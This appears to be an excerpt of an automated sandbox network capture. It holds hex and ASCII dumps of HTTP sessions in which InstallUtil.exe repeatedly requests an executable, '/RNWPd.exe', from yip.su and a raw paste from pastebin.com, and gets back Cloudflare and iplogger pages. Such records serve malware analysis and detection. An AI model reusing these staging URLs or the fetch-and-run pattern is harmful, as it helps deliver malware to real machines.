                            2024-09-10 16:20:59 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                            Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                            2024-09-10 16:20:59 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                            Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                            2024-09-10 16:20:59 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                            Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                            2024-09-10 16:20:59 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.1149712188.114.97.34437848C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            TimestampBytes transferredDirectionData
                            2024-09-10 16:21:00 UTC65OUTGET /RNWPd.exe HTTP/1.1
                            Host: yip.su
                            Connection: Keep-Alive
                            2024-09-10 16:21:01 UTC899INHTTP/1.1 200 OK
                            Date: Tue, 10 Sep 2024 16:21:00 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            memory: 0.42901611328125
                            expires: Tue, 10 Sep 2024 16:21:00 +0000
                            strict-transport-security: max-age=604800
                            strict-transport-security: max-age=31536000
                            content-security-policy: img-src https: data:; upgrade-insecure-requests
                            x-frame-options: SAMEORIGIN
                            Cache-Control: max-age=14400
                            CF-Cache-Status: EXPIRED
                            Last-Modified: Tue, 10 Sep 2024 16:21:00 GMT
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z7PTp9lfjK%2BBznhpXmtPaeb0vZ99s13JoU2yh5z37D3zkwEWugsuqp6lPl0VjjnpSvUmP0Jt5mvrpKeQtxvanJAor%2Bb1oCT3jtYDFR4%2BSu1%2FilHALLYLRu4%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8c10bfa5299041de-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-09-10 16:21:01 UTC470INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                            Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                            2024-09-10 16:21:01 UTC1369INData Raw: 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79
                            Data Ascii: er" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property
                            2024-09-10 16:21:01 UTC1369INData Raw: 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30
                            Data Ascii: olor:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0
                            2024-09-10 16:21:01 UTC1369INData Raw: 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b
                            Data Ascii: AgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);
                            2024-09-10 16:21:01 UTC1369INData Raw: 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72
                            Data Ascii: tyle>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-r
                            2024-09-10 16:21:01 UTC1369INData Raw: 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64
                            Data Ascii: margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="d
                            2024-09-10 16:21:01 UTC155INData Raw: 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: e.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                            2024-09-10 16:21:01 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.1149713104.20.3.2354437848C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            TimestampBytes transferredDirectionData
                            2024-09-10 16:21:05 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                            Host: pastebin.com
                            Connection: Keep-Alive
                            2024-09-10 16:21:05 UTC222INHTTP/1.1 200 OK
                            Date: Tue, 10 Sep 2024 16:21:05 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Frame-Options: SAMEORIGIN
                            Server: cloudflare
                            CF-RAY: 8c10bfc498b9726f-EWR
                            2024-09-10 16:21:05 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                            Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                            2024-09-10 16:21:05 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                            Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                            2024-09-10 16:21:05 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                            Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                            2024-09-10 16:21:05 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                            Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                            2024-09-10 16:21:05 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.1149714188.114.97.34437848C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            TimestampBytes transferredDirectionData
                            2024-09-10 16:21:05 UTC65OUTGET /RNWPd.exe HTTP/1.1
                            Host: yip.su
                            Connection: Keep-Alive
                            2024-09-10 16:21:06 UTC898INHTTP/1.1 200 OK
                            Date: Tue, 10 Sep 2024 16:21:06 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            memory: 0.36197662353515625
                            expires: Tue, 10 Sep 2024 16:21:06 +0000
                            strict-transport-security: max-age=604800
                            strict-transport-security: max-age=31536000
                            content-security-policy: img-src https: data:; upgrade-insecure-requests
                            x-frame-options: SAMEORIGIN
                            Cache-Control: max-age=14400
                            CF-Cache-Status: EXPIRED
                            Last-Modified: Tue, 10 Sep 2024 16:21:06 GMT
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PrYUgXpDBjrIJMQgolZUuq1mlWaC2cgU4p3G5syNdt2ToH2nsx9jIsges4Hczq%2FoSr8L31eioIFInFYKOOgIvxrMk45HvlvLy7BeufP%2BMUQnuV7tvLHYY2Q%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8c10bfca4fde1962-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-09-10 16:21:06 UTC471INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                            Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                            2024-09-10 16:21:06 UTC1369INData Raw: 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d
                            Data Ascii: r" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property=
                            2024-09-10 16:21:06 UTC1369INData Raw: 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e
                            Data Ascii: lor:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.
                            2024-09-10 16:21:06 UTC1369INData Raw: 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f
